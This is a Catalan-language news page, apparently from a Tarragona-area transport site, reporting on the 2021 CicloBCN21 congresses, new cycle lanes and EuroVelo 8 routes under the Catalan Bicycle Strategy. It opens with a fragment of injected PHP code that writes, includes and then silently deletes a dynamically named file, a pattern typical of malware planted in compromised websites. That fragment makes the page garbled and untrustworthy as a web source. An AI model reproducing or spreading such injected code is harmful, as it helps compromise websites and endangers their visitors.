");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Catalunya guanya vies ciclistes
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

Catalunya guanya vies ciclistes (06/10/2021)

El secretari general de la Vicepresidència, i de Polítiques Digitals i Territori, Ricard Font, obrirà demà el 7è Congrés Internacional de la Bicicleta i XVIII Congrés Ibèric que se celebren de forma conjunta, fins el 10 d’octubre a Barcelona, juntament amb el Congrés EuroVelo i Cicloturisme 2021. Aquest últim, ha comptat en la seva inauguració amb la intervenció del secretari de Territori i Mobilitat, Isidre Gavín. Aquests tres congressos, agrupats sota el nom CicloBCN21 i el lema Pedalem ciutats i territori, converteixen Catalunya en la capital d’aquest mode de transport.

Font explicarà l’estat d’execució de l’Estratègia Catalana de la bicicleta, que a finals de 2019 el govern va definir conjuntament amb les entitats de la bicicleta i la participació d’altres administracions. Un full de ruta amb 80 accions classificades en 3 pilars o eixos que ja s’han materialitzat en molts aspectes. Gavín, per la seva part, ha valorat la importància del sector del cicloturisme i ha anunciat l’arribada de la ruta cicloturística EuroVelo 8 i de la Ruta Mediterrània Prelitoral a Barcelona.

El principal repte de l’Estratègia és aconseguir que la bicicleta sigui protagonista d’una mobilitat quotidiana més amable duplicant la quota modal de la bicicleta per arribar a un 8% dels desplaçaments urbans i interconnectant àrees urbanes situades a l’entorn dels 10 km. En aquest sentit, s’han posat en marxa 14 nous quilòmetres de vies ciclistes (per valor de 5M€) i 28 més, per valor de 12M€, estan en obres.

A partir d’aquesta tardor, formarà part dels projectes executats, un nou tram de 2,6 quilòmetres de la via ciclista del Ter. El comprès entre el pont Perella i Sant Pau de Segúries amb un pressupost d’1,4 MEUR. D’aquesta manera es connecta Sant Joan de les Abadesses i Sant Pau de Segúries amb una via que discorre paraŀlela al marge esquerre del Ter fins a la carretera C-38, on el traçat segueix paraŀlel a la carretera fins a Sant Pau de Segúries.

Paraŀlelament, s’han atorgat 9 M€ de subvenció per vies ciclistes d’ens locals o consorcis i s’estan fent 10 tancats o aparcaments segurs a 10 estacions de FGC i a 5 de la xarxa de rodalies.

En el camp del cicloturisme, un dels congressos que acull Barcelona és l’EuroVelo i Cicloturisme 2021, que representa una gran oportunitat per donar impuls al cicloturisme a l’arc Mediterrani i estendre i consolidar la ruta EuroVelo 8, entre Cadis i Xipre, que transcorre per Catalunya i que la Generalitat està impulsant des de la Jonquera fins a Ulldecona.

Fins ara l’EuroVelo 8 a Catalunya s’estenia entre la Jonquera i Sils i a partir d’ara entren en funcionament els trams d’accés a Barcelona i també de la Ruta Mediterrània Prelitoral, que complementa l’EuroVelo 8 per les valls fluvials del Besòs-Mogent i el Llobregat. Uns treballs que han suposat la senyalització de més de 81 quilòmetres de ruta amb una inversió de 54.000 euros.

Les rutes Intercatalunya, la dels Llacs i la Ruta del Sió formen part també dels objectius traçats en l’Estratègia. Aquest tipus de cicloturisme genera anualment a Europa 2.300 milions de viatges i un impacte econòmic directe de 44.000 M€.

El tercer eix que desenvolupa l’Estratègia té a veure amb la promoció, seguiment i governança de la bicicleta. En aquest sentit, el CicloBCN21 és un dels principals exemples de foment de la mobilitat sostenible, saludable i descarbonitzada. S’ha aconseguit el màxim d’inscripcions permeses tenint en compte la pandèmia, que podran assistir de manera presencial a l’auditori AXA, però segueixen obertes les inscripcions online per algunes de les sessions.

Així, un cop obert el congrés per part del secretari, Ricard Font, el 7 d’octubre el director d’Infraestructures de Mobilitat, Xavier Flores moderarà la Plenària 1: Estratègies de ciutats, metròpolis i territoris per la bicicleta.

A continuació, en el marc de la Plenària 3: Aposta per la intermodalitat, Ferrocarrils de la Generalitat explicarà el projecte Bicitancats, que té per objectiu facilitar l’intercanvi modal en la mobilitat quotidiana. A més, l’empresa també exposarà com promou la mobilitat sostenible a les estacions de muntanya incorporant bicicletes elèctriques per als desplaçaments interns del personal i quins són els beneficis per al medi ambient. I, en el marc de l’EuroVelo, FGC exposarà la voluntat de la companyia d’impulsar un nou model turístic per al Pirineu català basat en la desestacionalització de la demanda turística i la diversificació de l’oferta a través de la promoció de l’ús de la bicicleta a les estacions de muntanya.

Aquest conjunt de congressos i activitats que tenen lloc en el marc del CICLOBCN21 és fruit de la suma d’esforços de la Generalitat de Catalunya, que ha liderat la iniciativa des dels Departaments competents en matèria d'Infraestructures i de Turisme, amb l’Ajuntament de Barcelona, la Diputació de Barcelona, l’Àrea Metropolitana de Barcelona (AMB), juntament amb la Federació Europea de Ciclistes (ECF), la Federació Portuguesa de Cicloturisme i Usuaris de la Bicicleta (FPCUB), ConBici i FEM Bici, i el suport de persones voluntàries i entitats ciclistes d’arreu del territori.

28 entitats adherides a l’Estratègia

L’Estratègia Catalana de la Bicicleta es basa en les jornades participatives i les sessions de treball dutes a terme en el marc de la Mesa de la Bicicleta des de l’any 2018, conjuntament amb els agents i les institucions relacionats amb el món de la bici. Ha aconseguit que administracions, institucions, empreses i organismes s’hi adhereixin expressant així no només un compromís del Govern de la Generalitat, sinó del conjunt de la societat.

Així, actualment hi ha 28 ens adherits a l’estratègia, majoritàriament ajuntaments com Reus, Lleida, Vic, St. Cugat del Vallès i Sabadell, entre altres. També s’hi ha sumat l’ATM de Barcelona, el Consorci de Promoció Turística Costa Maresme i el del Penedès, el Consell Comarcal del Maresme i el del Solsonès i la Xarxa de Ciutats i Pobles cap a la Sostenibilitat de la Diputació de Barcelona.

Font: Departament de la Vicepresidència, i de Polítiques Digitals i Territori

Catalunya guanya vies ciclistes

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona